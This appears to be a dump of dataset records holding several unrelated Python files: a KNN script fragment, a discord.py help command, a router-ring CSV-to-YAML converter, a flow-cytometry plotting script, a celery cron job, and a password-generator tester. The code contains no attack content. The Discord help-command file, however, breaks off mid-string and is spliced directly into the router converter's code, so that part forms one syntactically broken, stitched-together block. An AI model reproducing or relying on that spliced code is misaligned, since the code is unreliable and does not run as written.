load_csv(filename)\n\tfor i in range(1,len(dataset[0])):\n\t\tstr_column_to_float(dataset,i)\n\tstr_column_to_int(dataset, 0)\n\tn_folds = 10\n\tnum_neighbors = 10\n\tscores = evaluate_algorithm(dataset, k_nearest_neighbors, rmse_metric, n_folds, num_neighbors)\n\tprint('Score: {}'.format(scores))\n\tprint('Mean RMSE: %.3f' %(sum(scores)/float(len(scores))))\n\n\n# simple tests\ndef test():\n\tdataset = [[2.7810836,2.550537003,0],[1.465489372,2.362125076,0],\n\t[3.396561688,4.400293529,0],[1.38807019,1.850220317,0],\n\t[3.06407232,3.005305973,0],[7.627531214,2.759262235,1],\n\t[5.332441248,2.088626775,1],[6.922596716,1.77106367,1],\n\t[8.675418651,-0.242068655,1],[7.673756466,3.508563011,1]]\n\tpredict_class = predict_classification(dataset, dataset[0], 3)\n\tprint(predict_class)\n\tpredict_regre = predict_regression(dataset, dataset[0], 3)\n\tprint(predict_regre)\n\nif __name__ == '__main__':\n\t#test()\n\t#classify_test()\n\tregression_test()\n","sub_path":"KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"269003438","text":"import json\nimport discord\nfrom discord.ext import commands\n\n\nclass CustomHelpCommand(commands.DefaultHelpCommand):\n def __init__(self, **kwargs):\n self.mod_cmds = kwargs.pop('mod_cmds')\n\n self.prefixes = \", \".join(kwargs.pop('prefixes'))\n\n super().__init__(verify_checks=False)\n\n # desc = desc, help = perms, brief = cd\n async def send_command_help(self, command):\n footer_value = \"Note: you may be able to use the command multiple times before triggering the cooldown.\\n\" \\\n \"You should get a response or see the results of your command.\"\n\n embed = discord.Embed(\n title='Command: ' + command.name,\n colour=discord.Colour.gold()\n )\n\n cd_value = 'None'\n perms = 'None'\n desc = \"No Description\"\n example = '!' 
+ command.name\n\n if command.description:\n desc = command.description\n\n if command.brief is not None:\n brief_dict = json.loads(command.brief)\n\n example_list = brief_dict.get(\"examples\", None)\n cd = brief_dict.get('cd', None)\n\n # Replace ` with quotes\n if example_list is not None and example_list:\n example_list[:] = [s.replace('`', \"\\\"\") for s in example_list]\n example = \"\\n\".join(('!' + x for x in example_list))\n\n if example_list is not None and cd:\n cd = int(cd)\n if cd < 60:\n cd_value = str(cd) + ' second(s)'\n else:\n cd_value = str(cd//60) + ' minute(s)'\n\n if command.help is not None:\n permlist = command.help.split(', ')\n perms = \"\\n\".join(perm for perm in permlist)\n \n if command.aliases:\n aliases = \"\\n\".join(command.aliases)\n else:\n aliases = \"None\"\n\n if command.signature:\n usage_value = '!' + command.name + ' ' + command.signature + '\\n [] parameters are optional.\\n' \\\n 'If you want to give a parameter with spaces' \\\n ' use quotation marks `\"\"`'\n else:\n usage_value = '!' + command.name\n\n embed.description = desc\n embed.add_field(name='Aliases', value=aliases, inline=True)\n embed.add_field(name='Permissions (Any)', value=perms, inline=True)\n embed.add_field(name='Cooldown', value=cd_value, inline=True)\n embed.add_field(name='Usage', value=usage_value, inline=False)\n embed.add_field(name=\"Example(s)\", value=example, inline=False)\n embed.set_footer(text=footer_value)\n\n dest = self.get_destination()\n\n await dest.send(embed=embed)\n\n async def send_cog_help(self, cog):\n embed = discord.Embed(\n title=f\"Category: {cog.qualified_name}\",\n description=cog.description or \"No description\",\n colour=discord.Colour.gold()\n )\n\n sorted_commands = await self.filter_commands(cog.get_commands(), sort=True)\n\n \"\"\"\n cmd_list = []\n\n for cmd in sorted_commands:\n cmd_name = str(cmd)\n\n desc = \"\"\n\n if cmd.description:\n desc = ' - ' + cmd.description\n\n cmd_name = cmd_name + desc\n cmd_list.append(cmd_name)\n\n cmd_string = '\\n'.join(cmd_list)\n \"\"\"\n\n embed.add_field(name='Commands:', value='\\n'.join(str(cmd) + ' - !' 
+ cmd.name + \" \" + cmd.signature for\n cmd in sorted_commands))\n\n footer = \"\"\"[] parameters are optional.\\n'If you want to give a parameter with spaces use\n quotation marks \" \" \"\"\"\n\n embed.set_footer(text=footer)\n\n dest = self.get_destination()\n\n await dest.send(embed=embed)\n\n async def send_bot_help(self, mapping):\n embed = discord.Embed(\n title=\"All categories and commands\",\n description=\"To get information on a specific command or category type\\n\"\n \"`!help -n -r -i [-h]\" % sys.argv[0])\n sys.exit(2)\n\ndef proc_dsnodes_list(_nodes_list):\n xp = []\n # 0 1 2 3 4 5 6 7 8\n # #;Ring;Site;Node;System;N-SID;SBFD ID;Aggr;OSPF Area;SDP ID\n # 1;1;AGG_KIE799;ds1-ua0799;172.25.0.1;1001;524801;kie3;210;13001\n\n rw = re.compile('^(\\s+)?(\\<|\\*+|=+|^Port|Id|\\-+|$)')\n with open(_nodes_list, \"r\") as f:\n for line in f:\n# print(\"DS LINE: {}\".format(line))\n# r = rw.search(line)\n# if not r:\n# #z = re.split(';', remove_control_chars(line.rstrip()), 10)\n z = re.split(';', str_norm(line.rstrip().lstrip()), 10)\n xp.append (z)\n return xp\n\ndef proc_rings_list(_rings_list):\n rl = []\n with open(_rings_list, \"r\") as f:\n for i, l in enumerate(f):\n if i == 0:\n continue\n# print(\"i: {}; Ring LINE: {}\".format(i, l))\n l = re.split(';', str_norm(l.rstrip().lstrip()), 13)\n rl.append (l)\n return rl\n\ndef proc_aggrs_list(_rings_list):\n al = []\n with open(_rings_list, \"r\") as f:\n for i, line in enumerate(f):\n if i == 0:\n continue\n# print(\"i: {}; Aggr LINE: {}\".format(i, line))\n# r = rw.search(line)\n# if not r:\n# #z = re.split(';', remove_control_chars(line.rstrip()), 10)\n line = re.split(';', str_norm(line.rstrip().lstrip()), 10)\n al.append (line)\n f.close()\n return al\n\ndef get_chassis(_type):\n sp = re.compile(r'7750')\n r = sp.search(_type)\n if r:\n return 7750\n sp = re.compile(r'7250')\n r = sp.search(_type)\n if r:\n return 7250\n\ndef get_timos_version(_timos):\n debug(\"Timos str in: {}\".format(_timos), debugging)\n vs = '0.0.0'; v = {}\n v['full'] = ''; v['major'] = 0; v['minor'] = 0; v['release'] = 0;\n sp = re.compile(r'[tT][iI][mM][oO][sS](?=\\-[a-zA-Z]+\\-)(\\d+)\\.(\\d+)\\.(.*)|(?!\\-[a-zA-Z]+\\-)(\\d+)\\.(\\d+)\\.(.*)')\n r = sp.search(_timos.strip('\\ '))\n if r and r.group(0):\n vs = r.group(0)\n v['full'] = vs.strip('\\ ')\n v['major'] = vs.split('.')[0]\n va = vs.split('.')\n if len(va) > 2:\n v['minor'] = va[1]\n v['release'] = va[2]\n return v\n\ndef save_yaml(_routers, out_yaml = None):\n if out_yaml is None:\n out = sys.stdout\n else:\n out = open(out_yaml, 'w')\n try:\n d = yaml.dump(_routers, out, default_flow_style=False)\n finally:\n if out_yaml is not None:\n out.close()\n\nif __name__ == '__main__':\n o = redopt()\n\n if not os.path.exists(os.path.abspath(o['aggrs'])):\n error(\"Coudn't find aggrs file \\\"{}\\\" !\".format(o['aggrs']))\n sys.exit(2)\n\n if not os.path.exists(os.path.abspath(o['rings'])):\n error(\"Coudn't find rings file \\\"{}\\\" !\".format(o['rings']))\n sys.exit(2)\n\n if not os.path.exists(os.path.abspath(o['nodes'])):\n error(\"Coudn't find nodes file \\\"{}\\\" !\".format(o['nodes']))\n sys.exit(2)\n\n# DS Node List\nnl = proc_dsnodes_list(o['nodes'])\n\n# Ring list\nrl = proc_rings_list(o['rings'])\n\n# Aggr node List\nal = proc_aggrs_list(o['aggrs'])\n\nksnodes = []\nnodes_in_a_ring = []\naggrs_in_a_ring = []\n\n# aggregators list\naggrs = []\n# Aggr routers structured data\ndaggr = {}\na_header_map = [ 'id', 'ip', 'name', 'sid', 'sbfd', 'chassis', 'sros', 'sdpid' ]\n# Convert 
aggr_nodes list into dict\nfor a in al:\n### 0 1 2 3 4 5 6\n### ['1', '172.16.252.1', 'sr1-kie2', '1', '524288', '7750-SR12', 'TiMOS-C-19.10.R6', 1001]\n### id system_ip name sid bfd chassis SROS sdpid\n#\n if not (a[2]):\n continue\n data = (dict(zip(a_header_map,a)))\n# daggr[a[2]] = { 'id' : a[0], 'ip' : a[1], 'sid' : a[3], 'bfd': a[4], 'chassis': a[5], 'os': a[6] }\n daggr[a[2]] = data\n debug (\"AGGR data: {}\".format(data), debugging)\nal = ''\n\n# Fill DS node routers data struct for a ring N from the DS node list\n# Parse DS nodes data\nfor i, n in enumerate(nl):\n # 0 1 2 3 4 5 6 7 8 9\n # '72', '12', 'UA0891', 'ds2-ua0891', '172.25.1.35', '4387', '525092', 'kie2', '106', '13001'\n # 'id', 'ring #', 'site', 'node', 'system_ip', 'nsid', 'sbfd', 'aggr', 'ospf_area', 'sdp_id'\n\n if i == 0:\n continue\n y = {}\n y['bfd'] = {}\n y['ospf'] = []\n y['interfaces'] = []\n y['ports'] = []\n if int(n[1]) == int(o['index']):\n if not (n[3] in nodes_in_a_ring):\n nodes_in_a_ring.append(n[3])\n xn = {n[3] : {}}\n y['bfd']['discriminator'] = int(n[6])\n #y['ospf'].append({'type' : 'nssa', 'area' : int(n[8]) })\n y['ospf'].append({ 'area' : int(n[8]) })\n y['sdp'] = int(n[9])\n y['interfaces'].append( {'name': 'system', 'sid': int(n[5]), 'ip': \"{}/32\".format(n[4]), 'vlan': None, 'port': 'system', 'ospf_area': int(n[8])} )\n ksnodes.append({n[3]: y})\n print(\"Node: {}; IP: {}\".format(n[3],n[4]))\n\nri = 0\n# Fill DS node routers data struct for the ring N from the Ring list\n# Parse ring data\nfor r in rl:\n debug(\"Ring: {}\".format(r), debugging)\n## 0 1 2 3 4 5 6 7 8 9 10 11 12\n## Ring Site # Node # Site Node Peer Port Peer port Port Media SFP Interface OSPF IP (/31)\n## ['25', '1', '1', 'KIE3', 'sr1-kie3', 'ds1-ua0747', '', ' 1/1/31', '10GBASE-LR', 'SFP+', 'ds1-ua0747_if1', '210', '172.24.0.144;']\n## ['25', '2', '2', 'UA0747', 'ds1-ua0747', 'sr1-kie3', '1/1/31', '0', '10GBASE-LR', 'SFP+', 'sr1-kie3_if1', '210', '172.24.0.145;']\n\n if int(r[0]) == int(o['index']):\n if (ri % 2) == 0:\n _srlg = \"SRLG-ACW\"\n else:\n _srlg = \"SRLG-CW\"\n if not (r[4] in nodes_in_a_ring):\n info(\"Node \\\"{}\\\" is not known: aggregator?\".format(r[4]))\n # If a node is not one of DS node check the Aggr list data\n if r[4] in daggr:\n # It is - check if it's known yet\n if r[4] not in aggrs_in_a_ring:\n # Not known -> create a base structure for a node\n y = {}\n y['bfd'] = {}\n y['ospf'] = []\n y['interfaces'] = []\n y['ports'] = []\n y['chassis'] = \"{}\".format(get_chassis(daggr[r[4]]['chassis']))\n y['timos'] = get_timos_version(daggr[r[4]]['sros'])\n y['bfd']['discriminator'] = int(daggr[r[4]]['sbfd'])\n #y['ospf'].append({'type' : 'nssa', 'area' : int(r[11]) })\n y['ospf'].append({ 'area' : int(r[11]) })\n y['ports'].append( {'port': r[6], 'peer_name': r[5], 'peer_port': r[7], 'sfp': r[9]})\n y['interfaces'].append( { 'name': 'system', 'sid': int(daggr[r[4]]['sid']), 'ip': \"{}/32\".format(daggr[r[4]]['ip']), 'vlan': None, 'port': 'system', 'ospf_area': 0 } )\n y['interfaces'].append( { 'name' : \"{}_if1\".format(r[5]), 'port': r[6], 'vlan': 1, 'ip' : \"{}/31\".format(r[12]), 'ospf_area': int(r[11]), 'srlg': _srlg} )\n # Append a ring data to a node (aggr) data struct\n aggrs.append({r[4]: y})\n aggrs_in_a_ring.append(r[4])\n else:\n warning (\"Node {} is not defined!\".format(r[4]))\n\n else:\n print(\"Node: {}: \".format(r[4]))\n #print nodes_in_a_ring.index(r[3])\n print (\"@@ {} @@\".format (ksnodes[nodes_in_a_ring.index(r[4])][r[4]]))\n 
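# QSFP28 uplinks are broken out below: an extra /1 sub-port plus a matching interface entry are appended\n            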
##ksnodes[nodes_in_a_ring.index(r[2])][r[2]]['ospf'].append({'type' : 'nssa', 'area' : int(n[8]) })\n # Check SFP: QSFP28?\n if r[9] == \"QSFP28\":\n ksnodes[nodes_in_a_ring.index(r[4])][r[4]]['ports'].append( {'port': r[6], 'peer_name': r[5], 'peer_port': r[7], 'sfp': r[9]})\n ksnodes[nodes_in_a_ring.index(r[4])][r[4]]['ports'].append( {'port': \"{}/1\".format(r[6]), 'peer_name': r[5], 'peer_port': \"{}/1\".format(r[7]), 'sfp': \"CON\"})\n ksnodes[nodes_in_a_ring.index(r[4])][r[4]]['interfaces'].append( { 'name' : \"{}_if1\".format(r[5]), 'port': \"{}/1\".format(r[6]), 'vlan': 1, 'ip' : \"{}/31\".format(r[12]), 'ospf_area': int(r[11]), 'srlg': _srlg} )\n else:\n ksnodes[nodes_in_a_ring.index(r[4])][r[4]]['ports'].append( {'port': r[6], 'peer_name': r[5], 'peer_port': r[7], 'sfp': r[9]})\n ksnodes[nodes_in_a_ring.index(r[4])][r[4]]['interfaces'].append( { 'name' : \"{}_if1\".format(r[5]), 'port': r[6], 'vlan': 1, 'ip' : \"{}/31\".format(r[12]), 'ospf_area': int(r[11]), 'srlg': _srlg} )\n\n ri += 1\n #print (\"Incr: {}\".format(ri))\n\n#print ksnodes\nrouters = {}\nds = { 'ds': ksnodes }\naggr = {'aggr' : {} }\n#routers = { 'ds' : ksnodes, 'aggr' : {} }\nrouters = { 'routers' : { 'ds' : ksnodes, 'aggr' : aggrs } }\n#print (routers)\n\nif 'yaml' in o:\n save_yaml(routers, o['yaml'])\nelse:\n save_yaml(routers)\n\n#vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 syntax=python\n","sub_path":"xl2ya.py","file_name":"xl2ya.py","file_ext":"py","file_size_in_byte":11077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212420524","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 12 11:44:55 2019\n\n@author: bendalllab\n\"\"\"\n####################### importing modules needed ###############################\nimport os\nimport numpy as np\nimport seaborn as sns\nsns.set()\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom statsmodels.stats.multicomp import pairwise_tukeyhsd\nfrom statsmodels.stats.multicomp import MultiComparison\n\n######################### setting working directory ###########################\ninput_path = '/Users/bendalllab/Desktop/20190327 all immune in vasculature' \noutput_path = input_path + '/all_plots'\nif not os.path.exists(output_path):\n os.makedirs(output_path) \nstat_path = input_path + '/stat_plot_cell'\nif not os.path.exists(stat_path):\n os.makedirs(stat_path) \n\ncsv_file = '/in vasculature.csv'\ncsv_path = input_path + csv_file\n\n\n#################### reading in only important rows ###########################\n#make sure the column name is set as the column index\ncsv_file = pd.read_csv(csv_path, skiprows=range(0, 7)) \n#print(csv_file)\n\n################### cleaning up column and row names ##########################\n#replace any column names with \"/\" into \"-\"\n#otherwise they won't get assigned to right directory\n\ncsv_file.columns = csv_file.columns.str.replace(\"/\", \"_\")\n\n# drop any row containing control staining rows\ncsv_file = csv_file[~csv_file[\"FCS Filename\"].str.contains(\"control\")]\n\n#replace any row names with \" \" into \"-\" and eliminate double spaces\ncsv_file[\"FCS Filename\"] = csv_file[\"FCS Filename\"].str.replace(\" \", \" \").str.replace(\"PL \", \"PL-\")\n\n#print(csv_file.head(5))\n\n\n# in new df, split the \"FCS Filename\" column into 9\nnew_df = csv_file[\"FCS Filename\"].str.split(\" \", n = 8, expand = True)\n#print(new_df.head(20))\n\n# making seperate mouse id number column 
\ncsv_file[\"ID\"] = new_df[3] \n \n# making seperate embryonic day column\ncsv_file[\"Embryonic_day\"] = new_df[4]\n\n# making seperate organ column\ncsv_file[\"Sample_type\"] = new_df[5] \n\n# Dropping old Name columns \ncsv_file.drop(columns =[\"FCS Filename\"], inplace = True) \n\n#drop any row containing useless info\ncsv_file = csv_file[csv_file\n .columns.drop\n (list(csv_file.filter\n (regex=\"Time|DNA|Cisplatin|length|barcode|beadDist|barium|TER-119\")))]\n#https://docs.python.org/3.4/howto/regex.html\n#https://docs.python.org/2/library/re.html#re.split\ncsv_file.columns = csv_file.columns.str.replace(\" cells\", \"_cells\").str.replace(\"dians\", \"dians_\").str.replace(\"of|[()[\\]{}]|.....Di|-bead.| \", \"\")\n\n############# create relevant lists for variables of interest #################\n#create a list of organ names\norgans = csv_file[\"Sample_type\"].dropna().unique().tolist()\n\n#list the x axis values and put them in order\ndays = csv_file[\"Embryonic_day\"].dropna().unique().tolist()\ndays.sort(key = str.lower)\n\n################### rearranging data frame to long form #######################\n#arrange dataframe in long from\nmelt_df = csv_file.melt(id_vars = ['Embryonic_day', 'ID', 'Sample_type']\n ,var_name = 'cols'\n ,value_name = 'Value')\n\n# in new df, split the \"cols\" column into 2\nn_df = melt_df['cols'].str.split(\"for|on\", n = 1, expand = True)\n# making seperate cell id column \nmelt_df[\"Markers\"] = n_df[0]\nmelt_df[\"Cell_type\"] = n_df[1]\n# Dropping old Name columns \nmelt_df.drop(columns =[\"cols\"], inplace = True)\n\n#make a list for cell type\ncell_types = melt_df[\"Cell_type\"].unique().tolist()\nmarkers = melt_df[\"Markers\"].unique().tolist()\n\n#convert percent_df to all strings\nmelt_df['Value'] = melt_df['Value'].astype(str)\n\n#get rid of NaN strings\nmelt_df = melt_df[~melt_df['Value'].str.contains(\"NaN\")]\n\n#convert Value column strings into float\nmelt_df['Value'] = melt_df['Value'].astype(float)\n\nfor cell in cell_types:\n cell_df = melt_df.loc[melt_df[\"Cell_type\"] == cell]\n for marker in markers:\n marker_df = cell_df.loc[cell_df[\"Markers\"] == marker]\n sns.set(style='white'\n , rc={'figure.figsize':(25,25)})\n sns.set_context(\"notebook\"\n ,font_scale=1.5\n ,rc={\"lines.linewidth\": 2})\n {sns.catplot(x = 'Embryonic_day'\n ,y = 'Value'\n ,hue = 'Sample_type'\n ,order = days\n ,kind = \"bar\"\n ,palette=\"muted\"\n ,ci = 68\n ,data = marker_df\n ,legend_out = True\n ,aspect = 1.6\n ,height = 5)\n .set_axis_labels(\"Embryonic days\", \"Value\")}\n sns.despine(left = True)\n plt.title(cell + \"--\" + marker, pad=50)\n plt.subplots_adjust(top = 0.7)\n \n save_file = os.path.join(output_path, '{}--{}.png'.format(cell, marker)) \n \n if save_file:\n plt.savefig(save_file)\n plt.close()\n else:\n plt.show() \n\n\"\"\"\n\n########################## trying some stats ##################################\n###############################################################################\n\n\n############################# one way anova ###################################\n\n#https://www.marsja.se/four-ways-to-conduct-one-way-anovas-using-python/#anovapy\n#http://cleverowl.uk/2015/07/01/using-one-way-anova-and-tukeys-test-to-compare-data-sets/\n\ncell_df = melt_df.loc[melt_df[\"Cell_type\"] == 'B_cells']\norgan_df = cell_df.loc[cell_df[\"Sample_type\"] == 'PB']\nmarker_df = organ_df.loc[organ_df[\"Markers\"] == '%PD-L1+']\n\nby_day_df = marker_df.groupby(\"Embryonic_day\")[\"Value\"].apply(list).apply(pd.Series)\nF, p = 
stats.f_oneway(by_day_df.loc['E10.5'], by_day_df.loc['E11.5'])\nprint(F,p)\n\n############################ tukey's pairwise comparison ######################\n\nsig_day_df = pd.DataFrame()\n\nfor cell in cell_types:\n cell_df = melt_df.loc[melt_df[\"Cell_type\"] == cell]\n for organ in organs:\n organ_df = cell_df.loc[cell_df[\"Sample_type\"] == organ]\n for marker in markers:\n marker_df = organ_df.loc[organ_df[\"Markers\"] == marker]\n \n #determine stat sig diff btwn medians or % pos cell types in a given organ for a given marker across embryonic days\n mc = MultiComparison(marker_df['Value'], marker_df['Embryonic_day'])\n result = mc.tukeyhsd()\n \n #print(result)\n #print(mc.groupsunique) \n \n tukey_df = pd.DataFrame(data = result._results_table.data[1:]\n ,columns = result._results_table.data[0]) \n #make a dataframe with only the value True in reject column\n true_df_csv = tukey_df.loc[tukey_df['reject'] == True]\n \n #assign columns with cell, organ, and marker names\n true_df_csv = true_df_csv.assign(marker_id = marker).assign(cell_id = cell).assign(organ_id = organ)\n #combine all true_df_csv dataframes in one dataframe\n sig_day_df = sig_day_df.append(true_df_csv, ignore_index=True)\n \n #make a dataframe with the first two columns with value True in reject column\n true_df = tukey_df.loc[tukey_df['reject'] == True].iloc[:, 0:2]\n \n for index, row in true_df.iterrows():\n truemarker_df = marker_df.loc[(marker_df['Embryonic_day'] == row['group1'])|(marker_df['Embryonic_day'] == row['group2'])]\n sns.set(style='white'\n , rc={'figure.figsize':(25,25)})\n sns.set_context(\"notebook\"\n ,font_scale=1.5\n ,rc={\"lines.linewidth\": 2})\n {sns.catplot(x = 'Embryonic_day'\n ,y = 'Value'\n ,kind = \"bar\"\n ,palette=\"muted\"\n ,ci = 68\n ,data = truemarker_df\n ,legend_out = True\n ,aspect = 1.3\n ,height = 5)\n .set_axis_labels(\"Embryonic days\"\n , \"Value\")}\n sns.despine(left = True)\n plt.title(cell+ \"--\" + organ + \"--\" + marker, pad=50)\n plt.subplots_adjust(top = 0.7)\n \n #add statistical annotation \n #https://stackoverflow.com/questions/36578458/how-does-one-insert-statistical-annotations-stars-or-p-values-into-matplotlib/37518947#37518947\n x1, x2 = 0, 1 # find column numbers\n y, h, col = truemarker_df['Value'].max() + 2, 1, 'k'\n plt.plot([x1, x1, x2, x2], [y+h, y+h, y+h, y+h], lw=1.5, c=col)\n plt.text((x1+x2)*.5, y+h, \"*\", ha='center', va='bottom', color=col)\n \n save_file = os.path.join(stat_path, '{}-{}-{}-{}-{}-stats.png'.format(row['group1'], row['group2'], organ, marker, cell)) \n \n if save_file:\n plt.savefig(save_file)\n plt.close()\n else:\n plt.show()\n\nsig_day_path = os.path.join(stat_path,'tukeys_pairwise_embryonic_day.csv')\n# output to new csv\npd.DataFrame.to_csv(sig_day_df,sig_day_path)\n\"\"\"","sub_path":"20190312_grouped bars by organ.py","file_name":"20190312_grouped bars by organ.py","file_ext":"py","file_size_in_byte":9538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"201211780","text":"#!/usr/bin/env python\n\"\"\"Run background tasks in a crontab-like system using celery beat. 
Celery does\nnot daemonize itself, so this script should be run in a subprocess or managed\nusing supervisor or a similar tool.\n\nSimple invocation: ::\n\n $ ./cron.py\n\nCustomizable invocation: ::\n\n celery worker --app cron --beat\n\n\"\"\"\n\nimport celery\nfrom celery.schedules import crontab\n\nimport manage\n\n\napp = celery.Celery('cron')\napp.conf.update(\n BROKER_URL='sqla+sqlite:///beat.sqlite',\n CELERY_IMPORTS=('cron', ),\n CELERYBEAT_SCHEDULE={\n 'refresh': {\n 'task': 'cron.refresh',\n 'schedule': crontab(minute=0, hour=0),\n },\n }\n)\n\n\n@app.task\ndef refresh():\n with manage.app.test_request_context():\n manage.update_aggregates()\n manage.refresh_materialized()\n\n\nif __name__ == '__main__':\n app.worker_main(['worker', '--beat'])\n","sub_path":"cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"565732882","text":"#pwdmkr pytester v2.0b3\r\nimport os\r\nimport sys \r\nsys.dont_write_bytecode = True\r\nimport argparse\r\nfrom subprocess import call as system_call\r\nfrom subprocess import check_output as check_output\r\n\r\nparser = argparse.ArgumentParser(description='Pwdmkr tester')\r\nparser.add_argument('-v', action='store_true', help='Display version and exit')\r\nparser.add_argument('-s', action='store_true', help='Save test log to file')\r\nparser.add_argument('-f', action='store', dest='file', type=str,help='Destination file to save', default='pwdmkr_test_log.txt')\r\nparser.add_argument('-n', action='store', dest='name',type=str, help='Name of tested file', default='pwdmkr.py')\r\n\t\r\nargs = parser.parse_args()\r\n\r\nclass colors:\r\n\tWHITE = '\\033[0m'\r\n\tOKBLUE = '\\033[94m'\r\n\tOKGREEN = '\\033[92m'\r\n\tWARNING = '\\033[93m'\r\n\tFAIL = '\\033[91m'\r\n\r\ntest_type = 'PY'\r\nversion = '2.0b3'\r\n\r\nc_fail = colors.WHITE + '[' + colors.FAIL + 'FAIL' + colors.WHITE + ']'\r\nc_ok = colors.WHITE + '[' + colors.OKGREEN + 'OK' + colors.WHITE + ']'\r\n\r\ntest_d = ' ' * 101\r\n\r\ndef main(name):\r\n\ttest_v = check_output(['python', name, '-v'])\r\n\tsys.stdout.write(test_v)\r\n\tif len(test_v) <= 32:\r\n\t\tprint('v' + ' ' * 11 + c_ok)\r\n\telse:\r\n\t\tprint('v' + ' ' * 9 + c_fail)\r\n\r\n\tprint('\\nmodes:')\r\n\r\n\ttest_blank = check_output(['python', name])\r\n\tsys.stdout.write(test_blank)\r\n\tif len(test_blank) == 17:\r\n\t\tprint(' ' * 12 + c_ok)\r\n\telse:\r\n\t\tprint(' ' * 10 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'l'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:l' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('m:l' + ' ' * 7 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'n'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:n' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('m:n' + ' ' * 7 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 's'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:s' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('m:s' + ' ' * 7 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'ln'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:ln' + ' ' * 8 + c_ok)\r\n\telse:\r\n\t\tprint('m:ln' + ' ' * 6 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'ls'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:ls' + ' ' * 8 + c_ok)\r\n\telse:\r\n\t\tprint('m:ls' + ' ' * 6 + c_fail)\r\n\r\n\ttest_m = 
check_output(['python', name, '-m', 'ns'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:ns' + ' ' * 8 + c_ok)\r\n\telse:\r\n\t\tprint('m:ns' + ' ' * 6 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'lns'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:lns' + ' ' * 7 + c_ok)\r\n\telse:\r\n\t\tprint('m:lns' + ' ' * 5 + c_fail)\r\n\r\n\r\n\tprint('\\ncombined test:')\r\n\r\n\ttest_cmb = check_output(['python', name, '-l', '16', '-m', 'ln', '-d', '-', '-dl', '4'])\r\n\tsys.stdout.write(test_cmb)\r\n\tif len(test_cmb) == 20:\r\n\t\tprint('cmb' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('cmb' + ' ' * 7 + c_fail)\r\n\r\n\ttest_cmb = check_output(['python', name, '-l', '20', '-m', 'lns', '-d', '-', '-dl', '4'])\r\n\tsys.stdout.write(test_cmb)\r\n\tif len(test_cmb) == 25:\r\n\t\tprint('cmb' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('cmb' + ' ' * 7 + c_fail)\r\n\r\n\tprint('\\nsave test:')\r\n\r\n\ttest_s = check_output(['python', name, '-s'])[:16]\r\n\tprint(test_s)\r\n\tif test_s == open('password.txt').read()[:16]:\r\n\t\tprint('s' + ' ' * 11 + c_ok)\r\n\telse:\r\n\t\tprint('s' + ' ' * 9 + c_fail)\r\n\r\n\ttest_s = check_output(['python', name, '-fs'])[:16]\r\n\tprint(test_s)\r\n\tif test_s == open('password.txt').read()[:16]:\r\n\t\tprint('fs' + ' ' * 10 + c_ok)\r\n\telse:\r\n\t\tprint('fs' + ' ' * 8 + c_fail)\r\n\r\n\ttest_s = check_output(['python', name, '-s', '-f', 'file.txt'])[:16]\r\n\tprint(test_s)\r\n\tif test_s == open('file.txt').read()[:16]:\r\n\t\tprint('s f' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('s f' + ' ' * 7 + c_fail)\r\n\r\n\r\n\tsystem_call(['rm', 'password.txt'])\r\n\tif os.path.isfile('password.txt') == False:\r\n\t\tprint('rm' + ' ' * 10 + c_ok)\r\n\telse:\r\n\t\tprint('rm' + ' ' * 8 + c_fail)\r\n\r\n\tsystem_call(['rm', 'file.txt'])\r\n\tif os.path.isfile('file.txt') == False:\r\n\t\tprint('rm' + ' ' * 10 + c_ok)\r\n\telse:\r\n\t\tprint('rm' + ' ' * 8 + c_fail)\r\n\r\n\r\n\tprint('\\nerrors:')\r\n\r\n\tsystem_call(['touch', 'password.txt'])\r\n\tsystem_call(['python', name, '-s'])\r\n\tif len(check_output(['python', name, '-s'])) == 57:\r\n\t\tprint('s' + ' ' * 11 + c_ok)\r\n\telse:\r\n\t\tprint('s' + ' ' * 9 + c_fail)\r\n\r\n\tsystem_call(['rm', 'password.txt'])\r\n\r\n\tsystem_call(['python', name, '-s', '-fs'])\r\n\tif len(check_output(['python', name, '-s', '-fs'])) == 68:\r\n\t\tprint('s fs' + ' ' * 8 + c_ok)\r\n\telse:\r\n\t\tprint('s fs' + ' ' * 6 + c_fail)\r\n\r\n\tsystem_call(['python', name, '-l', '250001'])\r\n\tif len(check_output(['python', name, '-l', '250001'])) == 39:\r\n\t\tprint('l' + ' ' * 11 + c_ok)\r\n\telse:\r\n\t\tprint('l' + ' ' * 9 + c_fail)\r\n\r\n\tsystem_call(['python', name, '-d', test_d])\r\n\tif len(check_output(['python', name, '-d', test_d])) == 39:\r\n\t\tprint('d' + ' ' * 11 + 